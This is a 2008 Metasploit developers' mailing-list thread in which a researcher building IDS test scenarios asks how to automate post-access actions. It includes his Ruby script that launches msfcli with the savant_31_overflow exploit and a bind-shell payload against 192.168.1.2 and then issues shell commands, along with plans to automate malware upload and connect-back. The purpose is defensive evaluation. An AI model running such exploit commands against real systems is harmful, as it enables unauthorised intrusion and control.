Hi,

I am working on IDS evaluation against attack scenarios (which result from executing "attack tools" such as exploits as well as normal commands, e.g., ls, rm, etc.). I want to automate the process of generating attack scenarios. Metasploit is ideal for this purpose because it contains a reasonable number of exploits and can be extended easily to add more "attack tools". To automate the execution of attack scenarios, I wrote a Ruby script that executes msfcli through an IO.pipe and passes subsequent commands for execution. The problem is that large output from the executed command breaks the pipe. For example, the following code executes well until listing the files inside WINNT (I tried increasing the buffer length, but no luck):

  # "path" is the Metasploit install directory (assumed to be set earlier in the script)
  msfcli = path + "/" + "msfcli windows/http/savant_31_overflow payload=windows/shell/bind_tcp RHOST=192.168.1.2 E"
  pipe = IO.popen(msfcli, 'w+')
  pipe.sync = true
  puts pipe.sysread(1024)   # banner / first prompt of the session
  pipe.syswrite "dir\n"
  puts pipe.sysread(1024)
  pipe.syswrite "cd ..\n"
  puts pipe.sysread(1024)
  pipe.syswrite "cd winnt\n"
  puts pipe.sysread(2048)   # the large listing here is where the script breaks

Am I going in the right direction? Or is there another way to do this directly with Metasploit's own stuff?

Thanks,
Masgad

On Wed, Oct 22, 2008 at 8:58 PM, M. GAD <[EMAIL PROTECTED]> wrote:
> I am sorry, I forgot to pass my icq number (452697533)
>
> On Wed, Oct 22, 2008 at 3:45 PM, M. GAD <[EMAIL PROTECTED]> wrote:
>> Ok,
>> You can join me on icq as Masgad
>>
>> On Wed, Oct 22, 2008 at 3:16 PM, max moser <[EMAIL PROTECTED]> wrote:
>>> Hi, do you have an icq / im / skype? It's faster than email.
>>>
>>> My work is doing it based on meterpreter and the whole automation of it.
>>>
>>> max
>>>
>>> On Oct 22, 2008, at 2:51 PM, M. GAD wrote:
>>>
>>>> Hi Max
>>>> It is good news to find someone out there sharing the same interest.
>>>> However, I am afraid that we would waste our time doing the same stuff,
>>>> because I too did some stuff.
>>>> If you agree, we can launch a common project on this issue.
>>>>
>>>> Have a nice day,
>>>> MG
>>>>
>>>> On Wed, Oct 22, 2008 at 1:01 PM, max moser <[EMAIL PROTECTED]> wrote:
>>>>>
>>>>> Hi there,
>>>>>
>>>>> I am in the process of writing up a howto on this one, as well as
>>>>> contributing a lot of stuff back to the project. I did most of the stuff
>>>>> you mentioned already.
>>>>>
>>>>> Greetings
>>>>>
>>>>> max
>>>>>
>>>>> On Oct 22, 2008, at 12:33 PM, M. GAD wrote:
>>>>>
>>>>>> Hi all
>>>>>> I need your advice/help on the implementation of a new Metasploit module.
>>>>>> The idea is that we are sometimes interested not only in breaking
>>>>>> (penetrating) into systems but also in post-access actions, which can
>>>>>> be very significant for security analysis or evaluation (stateful or
>>>>>> behavior-based IDSes, for example).
>>>>>>
>>>>>> Metasploit already contains "access" actions as well as other useful
>>>>>> auxiliary tools of attack (e.g., DoS, scanners, etc.). So, I thought to
>>>>>> extend the Metasploit framework by a new module to imitate (and
>>>>>> automate) post-access actions that can probably be carried out by
>>>>>> attackers. For example, executing a sequence of commands to browse the
>>>>>> victim machine, upload a piece of malware, connect back to another
>>>>>> machine, etc.
>>>>>> The advantage of Metasploit is that it contains all we need to carry
>>>>>> out such actions, but the question is how to automate it. I know that
>>>>>> autopwn is an advanced step for doing this, but unfortunately it stops
>>>>>> at gaining access and establishing sessions. We need to go a step
>>>>>> further in the automation.
>>>>>>
>>>>>> What is the entry point to interact with the established sessions? How
>>>>>> can we execute commands, and receive and process their outputs?
>>>>>> I think Msf::Session is the key entry, right?
>>>>>>
>>>>>> Any help or suggestion to this end is highly appreciated.
>>>>>>
>>>>>> Best regards,
>>>>>> Mohammed GAD
>>>>>> _______________________________________________
>>>>>> Framework-Hackers mailing list
>>>>>> Framework-Hackers@spool.metasploit.com
>>>>>> http://spool.metasploit.com/mailman/listinfo/framework-hackers
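One way to avoid the single fixed-size sysread that the script above relies on, as an added example (not the poster's script and not Metasploit code): drive the child through IO.popen, append a sentinel echo to each command, and keep reading chunks until that sentinel arrives. A local sh stands in for the remote session so it runs offline; the PipeDriver class, its sentinel and the demo command are all constructed here.

```ruby
# Drives an interactive child process (a local sh stands in for the remote
# shell) and returns each command's complete output. Instead of one fixed-size
# sysread, every command is followed by a sentinel echo, and chunks are
# accumulated until the sentinel shows up, so output of any size is handled.
class PipeDriver
  SENTINEL = "__CMD_DONE__".freeze

  def initialize(cmd, timeout: 10)
    # 'r+' gives stdin and stdout of the child; stderr is merged into stdout.
    @pipe = IO.popen(cmd, 'r+', err: [:child, :out])
    @pipe.sync = true
    @timeout = timeout
    @buf = +""
  end

  # Send one command line and return everything it printed.
  def run(command)
    @pipe.write("#{command}\necho #{SENTINEL}\n")
    read_until(SENTINEL)
  end

  def close
    @pipe.close
  end

  private

  # Accumulate chunks until +marker+ shows up; fail if the child goes quiet
  # for +timeout+ seconds or exits before the command finished.
  def read_until(marker)
    loop do
      if (idx = @buf.index(marker))
        out = @buf[0...idx]
        @buf = @buf[(idx + marker.size)..-1].sub(/\A\n/, '')
        return out
      end
      raise IOError, "no output within #{@timeout}s" unless IO.select([@pipe], nil, nil, @timeout)
      begin
        @buf << @pipe.readpartial(4096)
      rescue EOFError
        raise IOError, "child exited before the command finished"
      end
    end
  end
end

# Constructed local demo: a short command, then one whose output is far
# larger than a single 1024-byte read could hold.
def demo
  d = PipeDriver.new(['sh'])
  first = d.run("echo first")
  big = d.run("i=0; while [ $i -lt 200 ]; do echo line $i; i=$((i+1)); done")
  d.close
  [first, big]
end
```

Against a remote command shell the same idea applies with whatever echo command that shell provides, and the sentinel should be something that cannot appear in legitimate output.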